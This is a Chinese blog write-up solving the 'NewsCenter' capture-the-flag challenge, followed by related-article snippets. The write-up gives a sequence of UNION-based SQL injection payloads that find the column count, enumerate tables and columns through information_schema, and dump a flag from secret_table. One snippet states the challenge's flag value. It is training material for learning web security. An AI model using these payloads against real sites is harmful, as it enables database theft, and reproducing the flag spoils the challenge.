攻防世界 - NewsCenter - WriteUp

最新推荐文章于 2024-06-04 10:54:58 发布
最新推荐文章于 2024-06-04 10:54:58 发布
阅读量1.3w 收藏 23
点赞数 12
分类专栏: 学习日记 CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42151611/article/details/91347270
版权

NewsCenter

这一题考察的是 SQL 注入

首先用 ' and 0 union select 1,2,3 # 来初步判断该sql查询返回三列数据

然后用 ' and 0 union select 1,TABLE_SCHEMA,TABLE_NAME from INFORMATION_SCHEMA.COLUMNS # 得到表名,很明显我们需要得到 secret_table 表中的内容
再用 ' and 0 union select 1,column_name,data_type from information_schema.columns where table_name='secret_table'# 得到 secret_table 表的列名以及数据类型

最后就可以简单粗暴地得到flag
' and 0 union select 1,2,fl4g from secret_table #

尽管这一题用sqlmap也很好做,但是如果学习的话,还是自己手操一遍比较好
哒君
关注
  • 12
    点赞
  • 23
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界Crypto、Broadcast、Morse、Caesar、base64
Welcome To Myon'Blog !
12-18 1477
攻防世界 Crypto Broadcast Morse Caesar base64
XCTF-高手进阶区:NewsCenter
1stPeak's Blog
06-13 3189
XCTF-高手进阶区:NewsCenter
攻防世界XCTF-MISC入门12题解题报告
最新发布
wholeliubei的博客
06-04 1038
如果你也想学习:黑客&网络安全的零基础攻防教程MISC属于CTF中的脑洞题,简直就是信息安全界的脑筋急转弯。你说它渣,它也有亮点,不好评说。这块最亮眼的入门题就属隐写术,出题人骚的狠。但是我感觉未来其中一个重点,就是大数据安全,从海量流量中捕获恶意流量,比如流量中有一个常见的OWASP10攻击,flag就藏在恶意流量里面,找到攻击就找到flag。准备大年30晚上把这块吃掉。写文章不容易,求三连。
XCTF攻防世界-NewsCenter-SQL简单注入-sqlmap注入
MJosek博客
03-23 1192
题目地址:https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=1&id=4686&page=1 我们进入页面 观察界面我们考虑到是sql注入 这里我们演示的是sqlmap的注入方法 首先我们页面的post请求进行抓包操作 ...
XCTF:NewsCenter
Keepb1ue的博客
01-12 1625
一道简单的常规注入题
攻防世界-lottery-(详细操作)做题笔记
qq_43715020的博客
06-15 1776
攻防世界-lottery-(详细操作)做题笔记
Python库 | newscenter-1.6.3.tar.gz
05-19
资源分类:Python库 所属语言:Python 资源全名:newscenter-1.6.3.tar.gz 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
Python库 | newscenter-2.0.23.tar.gz
04-12
资源分类:Python库 所属语言:Python 资源全名:newscenter-2.0.23.tar.gz 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
PyPI 官网下载 | newscenter-2.0.4.tar.gz
01-14
《PyPI官网下载 | newscenter-2.0.4.tar.gz——深入了解Python库的发布与使用》 在Python的世界里,PyPI(Python Package Index)是最重要的资源库,它为全球的开发者提供了一个集中地,可以发布、分享并下载Python...
newscenter_app
02-20
新闻中心单击以获取实时版本背景和概述新闻中心现场直播了当今主流媒体如何报道当前的主题。 一次查看CNN,Fox News,NBC,NYTimes和Huffington Post主页上的精选文章。 这个使用React构建的应用程序充当前端,并与...
NewsCenter
06-23
【新闻中心】是一个基于ASP和SQL技术开发的新闻管理系统,具备基本的新闻发布、管理功能。这个系统采用三层架构设计,确保了代码的可维护性、扩展性和模块化。以下是该系统的详细知识点: **1....
攻防世界-lottery
Mirror_iu的博客
01-22 227
原本看到这题这么多代码是想跳过的,毕竟不想来一个 PHP 代码审计,后面发现还好,就是一个简单的弱类型漏洞。
XCTF_NewsCenter
TA不懒,但还没有添加简介
01-17 2961
XCTF_NewsCenter
攻防世界XCTF:NewsCenter
末初的CSDN博客
03-06 401
这道题是一个非常简单的sql注入 ’ and 1=1#回显正常,’ and 1=2#回显不正常。即可判断存在sql注入。 接着查看,这张表有几个字段,'order by 3#正常,'order by 4#报错,判断存在3个字段。 联合查询,发现2,3这两个字段存在回显。 查询版本和当前连接的数据库 查询当前用户和所有数据库 查表名 查字段 获取字段内容 ...
攻防世界 web进阶 NewsCenter
weixin_43345082的博客
06-12 1455
看到这道题没什么头绪,扫完之后没有什么有用的信息 只有一个输入,试试sql 首先判断列,1’ order by 3# 有3列 首先去爆库 1’ union select 1,2,database()# 库是news,继续爆表 看到一个secret_table,爆他的列 1’ union select 1,2,column_name from information_schema.colum...
xctf攻防世界misc基础题解(新手食用)
Spwpun的博客
05-01 7325
status:更新中… 0x01 提示就是flag。 0x02 ext3 考察linux下如何挂载光盘,base64编码。 挂载下载的光盘文件到linux_cd目录下: 然后在目录下找到flag.txt: 最后base64解码即可: 0x03 base64stego zip伪加密,但是好像使用7Z打开就直接可以解压,哈哈。解压之后有一个stego.txt,隐写,打开来看是一长串base6...
攻防世界(高手进阶区)——NaNNaNNaNNaN-Batman
知足且坚定,温柔且上进
02-11 696
下载附件 有乱码,但可以发现是js代码。 用浏览器打开出现一个搜索框,但没有什么反应。 参考了其他大佬的wp, 核心代码: eval函数,这是执行函数;这里执行了_变量中的内容也就是''中的内容。 但是,要注意的是,它并没有执行$()函数,仅仅执行了字符串而已(从而导致乱码), 因而页面html页面没有任何显示,只显示了input标签的内容,但是我们想让源代码正常显示出来, 不进行执行...
攻防世界misc 第二题要领
舞动的獾
04-19 2078
攻防世界misc第二题 ext3文件是一种Linux日志文件,所以在在Linux系统下用 strings linux |grep flag 结果如下: 这条命令是查找Linux文件中的包含flag字符的文件 我们看到有一个flag.txt 挂载此文件,然后查看flag.txt mount linux /mnt cd /mnt ls cd 07avZhikgbf/ vim flag.txt 这...
攻防世界-NewsCenter详解
Mr_helloword的博客
08-11 5369
NewsCenter 进入后我们发现有一个搜索框进行新闻搜索我们尝试有无sql注入 我们输入1’ and 1=1 #判断有无sql注入发现有 查看列数1’ order by 3 # 联合查询 1’ union select 1,2,3 # 查表: 1’ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() # 查字段: 1’ union
攻防世界 newscenter
09-08
攻防世界NewsCenter是一个基于React构建的前端应用程序,它提供了实时版本的背景和概述,展示了当前主流媒体如何报道当下的主题。你可以通过查看CNN、Fox News、NBC、NYTimes和Huffington Post主页上的精选文章来了解更多信息。此外,NewsCenter还涉及到CTF(Capture The Flag)比赛和SQL注入攻击的内容。在这个应用程序中,有两个表,分别是news和secret_table,我们需要从secret_table表中找到flag(标志)。通过构造SQL语句,并利用搜索(search)功能,我们可以使用union select和group_concat函数来获取所需的信息。最后,通过执行以下SQL语句search=-1' union select 1,version(),group_concat(fl4g) from secret_table --,我们可以得到flag的值为QCTF{sq1_inJec7ion_ezzz}。这是一个CTF比赛中的一个关卡,攻防世界NewsCenter也是为了帮助新手了解和学习Web安全而创建的。<span class="em">1</span><span class="em">2</span><span class="em">3</span>
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值